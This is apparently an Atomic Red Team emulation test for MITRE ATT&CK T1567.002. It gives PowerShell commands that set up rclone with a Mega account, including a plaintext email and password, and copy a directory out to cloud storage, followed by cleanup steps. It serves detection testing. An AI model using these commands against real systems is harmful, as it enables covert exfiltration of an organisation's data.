T1567.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Description from ATT&CK
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
Atomic Tests
Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)
This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Supported Platforms: windows
auto_generated_guid: 8529ee44-279a-4a19-80bf-b846a40dda58
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| rclone_path | Directory of rclone.exe | path | PathToAtomicsFolder..\ExternalPayloads\T1567.002\rclone-v*\ |
| rclone_config_path | Path to rclone's config file (default should be fine) | path | $env:appdata |
| dir_to_copy | Directory to copy | string | PathToAtomicsFolder..\ExternalPayloads\T1567.002 |
| mega_user_account | Mega user account | string | atomictesting@outlook.com |
| mega_user_password | Mega user password | string | vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA |
| remote_share | Remote Mega share | string | T1567002 |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd "#{rclone_path}"
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k "#{dir_to_copy}" #{remote_share}:test -v
Cleanup Commands:
1
2
3
4
5
6
7
8
cd "#{rclone_path}"
.\rclone.exe purge #{remote_share}:test
.\rclone.exe config delete #{remote_share}:
Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force
Dependencies: Run with powershell!
Description: rclone must exist at (#{rclone_path})
Check Prereq Commands:
1
2
if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\T1567.002\" -force